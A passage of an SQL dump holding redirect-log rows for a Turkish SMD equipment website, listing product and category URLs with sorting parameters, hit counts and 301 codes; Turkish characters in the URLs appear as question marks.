00:00:00',301),(41555,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,category_name',NULL,'','',1,0,'2025-06-28 19:53:28','0000-00-00 00:00:00',301),(41556,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 19:53:31','0000-00-00 00:00:00',301),(41557,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:34','0000-00-00 00:00:00',301),(41558,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:38','0000-00-00 00:00:00',301),(41559,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,mf_name',NULL,'','',1,0,'2025-06-28 19:53:41','0000-00-00 00:00:00',301),(41560,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-28 19:53:44','0000-00-00 00:00:00',301),(41561,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:47','0000-00-00 00:00:00',301),(41562,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:51','0000-00-00 00:00:00',301),(41563,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,ordering',NULL,'','',1,0,'2025-06-28 19:53:54','0000-00-00 00:00:00',301),(41564,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-28 19:53:57','0000-00-00 00:00:00',301),(41565,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,product_name',NULL,'','',1,0,'2025-06-28 19:54:00','0000-00-00 00:00:00',301),(41566,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-28 19:54:03','0000-00-00 00:00:00',301),(41567,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 19:54:23','0000-00-00 00:00:00',301),(41568,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h???language=en-gb',NULL,'','',1,0,'2025-06-28 19:54:26','0000-00-00 00:00:00',301),(41569,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z',NULL,'','',2,0,'2025-06-28 19:54:29','0000-00-00 00:00:00',301),(41570,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 19:54:32','0000-00-00 00:00:00',301),(41571,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 19:54:36','0000-00-00 00:00:00',301),(41572,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?language=en-gb',NULL,'','',16,0,'2025-06-28 19:54:39','0000-00-00 00:00:00',301),(41573,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name',NULL,'','',2,0,'2025-06-28 19:54:45','0000-00-00 00:00:00',301),(41574,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:54:49','0000-00-00 00:00:00',301),(41575,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name',NULL,'','',2,0,'2025-06-28 19:54:59','0000-00-00 00:00:00',301),(41576,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:55:02','0000-00-00 00:00:00',301),(41577,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,ordering',NULL,'','',2,0,'2025-06-28 19:55:12','0000-00-00 00:00:00',301),(41578,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name',NULL,'','',2,0,'2025-06-28 19:55:18','0000-00-00 00:00:00',301),(41579,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:55:21','0000-00-00 00:00:00',301),(41580,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_sku',NULL,'','',2,0,'2025-06-28 19:55:31','0000-00-00 00:00:00',301),(41581,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-28 19:55:38','0000-00-00 00:00:00',301),(41582,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n',NULL,'','',2,0,'2025-06-28 19:55:47','0000-00-00 00:00:00',301),(41583,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 19:55:51','0000-00-00 00:00:00',301),(41584,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 19:55:54','0000-00-00 00:00:00',301),(41585,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 19:55:57','0000-00-00 00:00:00',301),(41586,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 19:56:00','0000-00-00 00:00:00',301),(41587,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,category_name',NULL,'','',2,0,'2025-06-28 19:56:04','0000-00-00 00:00:00',301),(41588,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-28 19:56:07','0000-00-00 00:00:00',301),(41589,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 19:56:10','0000-00-00 00:00:00',301),(41590,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-28 19:56:14','0000-00-00 00:00:00',301),(41591,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,mf_name',NULL,'','',2,0,'2025-06-28 19:56:17','0000-00-00 00:00:00',301),(41592,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:56:20','0000-00-00 00:00:00',301),(41593,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 19:56:23','0000-00-00 00:00:00',301),(41594,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 19:56:27','0000-00-00 00:00:00',301),(41595,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,ordering',NULL,'','',2,0,'2025-06-28 19:56:30','0000-00-00 00:00:00',301),(41596,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,ordering?language=en-gb',NULL,'','',2,0,'2025-06-28 19:56:33','0000-00-00 00:00:00',301),(41597,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,product_name',NULL,'','',2,0,'2025-06-28 19:56:37','0000-00-00 00:00:00',301),(41598,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:56:40','0000-00-00 00:00:00',301),(41599,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 19:56:43','0000-00-00 00:00:00',301),(41600,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,product_name?language=en-gb',NULL,'','',2,0,'2025-06-28 19:56:46','0000-00-00 00:00:00',301),(41601,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,product_sku',NULL,'','',2,0,'2025-06-28 19:56:50','0000-00-00 00:00:00',301),(41602,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/by,product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 19:56:53','0000-00-00 00:00:00',301),(41603,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/dirdesc',NULL,'','',3,0,'2025-06-28 19:56:56','0000-00-00 00:00:00',301),(41604,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 19:57:00','0000-00-00 00:00:00',301),(41605,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-f??n?language=en-gb',NULL,'','',3,0,'2025-06-28 19:57:03','0000-00-00 00:00:00',301),(41606,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??',NULL,'','',3,0,'2025-06-28 19:57:06','0000-00-00 00:00:00',301),(41607,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 19:57:09','0000-00-00 00:00:00',301),(41608,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 19:57:13','0000-00-00 00:00:00',301),(41609,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 19:57:16','0000-00-00 00:00:00',301),(41610,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 19:57:19','0000-00-00 00:00:00',301),(41611,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,category_name',NULL,'','',3,0,'2025-06-28 19:57:22','0000-00-00 00:00:00',301),(41612,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-28 19:57:26','0000-00-00 00:00:00',301),(41613,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 19:57:29','0000-00-00 00:00:00',301),(41614,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,category_name?language=en-gb',NULL,'','',2,0,'2025-06-28 19:57:32','0000-00-00 00:00:00',301),(41615,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,mf_name',NULL,'','',2,0,'2025-06-28 19:57:35','0000-00-00 00:00:00',301),(41616,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:57:39','0000-00-00 00:00:00',301),(41617,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 19:57:42','0000-00-00 00:00:00',301),(41618,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 19:57:45','0000-00-00 00:00:00',301),(41619,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,ordering',NULL,'','',2,0,'2025-06-28 19:57:48','0000-00-00 00:00:00',301),(41620,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,ordering?language=en-gb',NULL,'','',2,0,'2025-06-28 19:57:51','0000-00-00 00:00:00',301),(41621,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,product_name',NULL,'','',2,0,'2025-06-28 19:57:55','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (41622,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 19:57:58','0000-00-00 00:00:00',301),(41623,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 19:58:01','0000-00-00 00:00:00',301),(41624,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,product_name?language=en-gb',NULL,'','',2,0,'2025-06-28 19:58:04','0000-00-00 00:00:00',301),(41625,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,product_sku',NULL,'','',2,0,'2025-06-28 19:58:07','0000-00-00 00:00:00',301),(41626,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/by,product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 19:58:11','0000-00-00 00:00:00',301),(41627,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/cs40-detail',NULL,'','',3,0,'2025-06-28 19:58:14','0000-00-00 00:00:00',301),(41628,'https://3s-technologies.com.tr/index.php/en/products/smd-f?n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 20:25:08','0000-00-00 00:00:00',301),(41629,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:25:13','0000-00-00 00:00:00',301),(41630,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:25:20','0000-00-00 00:00:00',301),(41631,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:25:26','0000-00-00 00:00:00',301),(41632,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,category_name?language=en-gb',NULL,'','',3,0,'2025-06-28 20:25:32','0000-00-00 00:00:00',301),(41633,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,mf_name',NULL,'','',3,0,'2025-06-28 20:25:37','0000-00-00 00:00:00',301),(41634,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:25:42','0000-00-00 00:00:00',301),(41635,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:25:46','0000-00-00 00:00:00',301),(41636,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,mf_name?language=en-gb',NULL,'','',3,0,'2025-06-28 20:25:50','0000-00-00 00:00:00',301),(41637,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,ordering',NULL,'','',3,0,'2025-06-28 20:25:55','0000-00-00 00:00:00',301),(41638,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,ordering?language=en-gb',NULL,'','',3,0,'2025-06-28 20:26:00','0000-00-00 00:00:00',301),(41639,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,product_name',NULL,'','',2,0,'2025-06-28 20:26:04','0000-00-00 00:00:00',301),(41640,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:26:09','0000-00-00 00:00:00',301),(41641,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:26:13','0000-00-00 00:00:00',301),(41642,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,product_name?language=en-gb',NULL,'','',3,0,'2025-06-28 20:26:17','0000-00-00 00:00:00',301),(41643,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,product_sku',NULL,'','',3,0,'2025-06-28 20:26:22','0000-00-00 00:00:00',301),(41644,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 20:26:26','0000-00-00 00:00:00',301),(41645,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/dirdesc',NULL,'','',3,0,'2025-06-28 20:26:31','0000-00-00 00:00:00',301),(41646,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:26:35','0000-00-00 00:00:00',301),(41647,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/mx200lp-detail',NULL,'','',3,0,'2025-06-28 20:26:39','0000-00-00 00:00:00',301),(41648,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/mx200lp-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-28 20:26:43','0000-00-00 00:00:00',301),(41649,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h???language=en-gb',NULL,'','',3,0,'2025-06-28 20:26:48','0000-00-00 00:00:00',301),(41650,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z',NULL,'','',3,0,'2025-06-28 20:26:53','0000-00-00 00:00:00',301),(41651,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 20:26:57','0000-00-00 00:00:00',301),(41652,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 20:27:01','0000-00-00 00:00:00',301),(41653,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?language=en-gb',NULL,'','',34,0,'2025-06-28 20:27:06','0000-00-00 00:00:00',301),(41654,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,category_name',NULL,'','',3,0,'2025-06-28 20:27:15','0000-00-00 00:00:00',301),(41655,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:27:20','0000-00-00 00:00:00',301),(41656,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,mf_name',NULL,'','',3,0,'2025-06-28 20:27:31','0000-00-00 00:00:00',301),(41657,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:27:36','0000-00-00 00:00:00',301),(41658,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,ordering',NULL,'','',3,0,'2025-06-28 20:27:47','0000-00-00 00:00:00',301),(41659,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,product_name',NULL,'','',3,0,'2025-06-28 20:27:55','0000-00-00 00:00:00',301),(41660,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:27:59','0000-00-00 00:00:00',301),(41661,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/by,product_sku',NULL,'','',3,0,'2025-06-28 20:28:10','0000-00-00 00:00:00',301),(41662,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/cm-602-l-detail',NULL,'','',3,0,'2025-06-28 20:28:17','0000-00-00 00:00:00',301),(41663,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?tmpl=component',NULL,'','',9,0,'2025-06-28 20:28:21','0000-00-00 00:00:00',301),(41664,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/dirdesc',NULL,'','',3,0,'2025-06-28 20:28:24','0000-00-00 00:00:00',301),(41665,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/mx200lp-3-detail',NULL,'','',3,0,'2025-06-28 20:28:32','0000-00-00 00:00:00',301),(41666,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-h?z/npm-detail',NULL,'','',3,0,'2025-06-28 20:28:39','0000-00-00 00:00:00',301),(41667,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim',NULL,'','',3,0,'2025-06-28 20:28:50','0000-00-00 00:00:00',301),(41668,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 20:28:53','0000-00-00 00:00:00',301),(41669,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 20:28:56','0000-00-00 00:00:00',301),(41670,'https://3s-technologies.com.tr/index.php/en/products/?language=en-gb',NULL,'','',23,0,'2025-06-28 20:29:00','0000-00-00 00:00:00',301),(41671,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,category_name',NULL,'','',1,0,'2025-06-28 20:29:07','0000-00-00 00:00:00',301),(41672,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 20:29:10','0000-00-00 00:00:00',301),(41673,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,mf_name',NULL,'','',2,0,'2025-06-28 20:29:21','0000-00-00 00:00:00',301),(41674,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 20:29:25','0000-00-00 00:00:00',301),(41675,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,ordering',NULL,'','',2,0,'2025-06-28 20:29:35','0000-00-00 00:00:00',301),(41676,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,product_name',NULL,'','',2,0,'2025-06-28 20:29:42','0000-00-00 00:00:00',301),(41677,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-28 20:29:46','0000-00-00 00:00:00',301),(41678,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/by,product_sku',NULL,'','',2,0,'2025-06-28 20:29:56','0000-00-00 00:00:00',301),(41679,'https://3s-technologies.com.tr/index.php/en/products/?ubuk-lehim/dirdesc',NULL,'','',2,0,'2025-06-28 20:30:03','0000-00-00 00:00:00',301),(41680,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-28 20:56:39','0000-00-00 00:00:00',301),(41681,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/dirdesc',NULL,'','',2,0,'2025-06-28 20:56:42','0000-00-00 00:00:00',301),(41682,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:56:46','0000-00-00 00:00:00',301),(41683,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/le-40v-detail',NULL,'','',2,0,'2025-06-28 20:56:49','0000-00-00 00:00:00',301),(41684,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/le-40v-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-28 20:56:52','0000-00-00 00:00:00',301),(41685,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/ls60v-detail',NULL,'','',2,0,'2025-06-28 20:56:55','0000-00-00 00:00:00',301),(41686,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl??/ls60v-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-28 20:56:58','0000-00-00 00:00:00',301),(41687,'https://3s-technologies.com.tr/index.php/en/products/smd-d????k-h??zl???language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:01','0000-00-00 00:00:00',301),(41688,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n',NULL,'','',2,0,'2025-06-28 20:57:05','0000-00-00 00:00:00',301),(41689,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,`p`.product_sku',NULL,'','',2,0,'2025-06-28 20:57:08','0000-00-00 00:00:00',301),(41690,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-28 20:57:12','0000-00-00 00:00:00',301),(41691,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:15','0000-00-00 00:00:00',301),(41692,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:19','0000-00-00 00:00:00',301),(41693,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,category_name',NULL,'','',2,0,'2025-06-28 20:57:23','0000-00-00 00:00:00',301),(41694,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-28 20:57:26','0000-00-00 00:00:00',301),(41695,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:30','0000-00-00 00:00:00',301),(41696,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,category_name?language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:34','0000-00-00 00:00:00',301),(41697,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-28 20:57:38','0000-00-00 00:00:00',301),(41698,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:41','0000-00-00 00:00:00',301),(41699,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,ordering',NULL,'','',2,0,'2025-06-28 20:57:44','0000-00-00 00:00:00',301),(41700,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,ordering?language=en-gb',NULL,'','',2,0,'2025-06-28 20:57:47','0000-00-00 00:00:00',301),(41701,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,product_name',NULL,'','',2,0,'2025-06-28 20:57:51','0000-00-00 00:00:00',301),(41702,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,product_name/dirdesc',NULL,'','',3,0,'2025-06-28 20:57:55','0000-00-00 00:00:00',301),(41703,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:57:58','0000-00-00 00:00:00',301),(41704,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,product_name?language=en-gb',NULL,'','',3,0,'2025-06-28 20:58:01','0000-00-00 00:00:00',301),(41705,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,product_sku',NULL,'','',3,0,'2025-06-28 20:58:04','0000-00-00 00:00:00',301),(41706,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,product_sku?language=en-gb',NULL,'','',3,0,'2025-06-28 20:58:08','0000-00-00 00:00:00',301),(41707,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/dirdesc',NULL,'','',3,0,'2025-06-28 20:58:11','0000-00-00 00:00:00',301),(41708,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-28 20:58:14','0000-00-00 00:00:00',301),(41709,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/gf-12-hc-ht-detail',NULL,'','',3,0,'2025-06-28 20:58:17','0000-00-00 00:00:00',301),(41710,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-28 20:58:21','0000-00-00 00:00:00',301),(41711,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/ly-8c-detail',NULL,'','',2,0,'2025-06-28 20:58:24','0000-00-00 00:00:00',301),(41712,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-28 20:58:27','0000-00-00 00:00:00',301),(41713,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n?language=en-gb',NULL,'','',3,0,'2025-06-28 20:58:30','0000-00-00 00:00:00',301),(41714,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??',NULL,'','',3,0,'2025-06-28 20:58:33','0000-00-00 00:00:00',301),(41715,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/am100-detail',NULL,'','',3,0,'2025-06-28 20:58:36','0000-00-00 00:00:00',301),(41716,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/am100-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-28 20:58:40','0000-00-00 00:00:00',301),(41717,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,`p`.product_sku',NULL,'','',3,0,'2025-06-28 20:58:43','0000-00-00 00:00:00',301),(41718,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-h??/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-28 20:58:47','0000-00-00 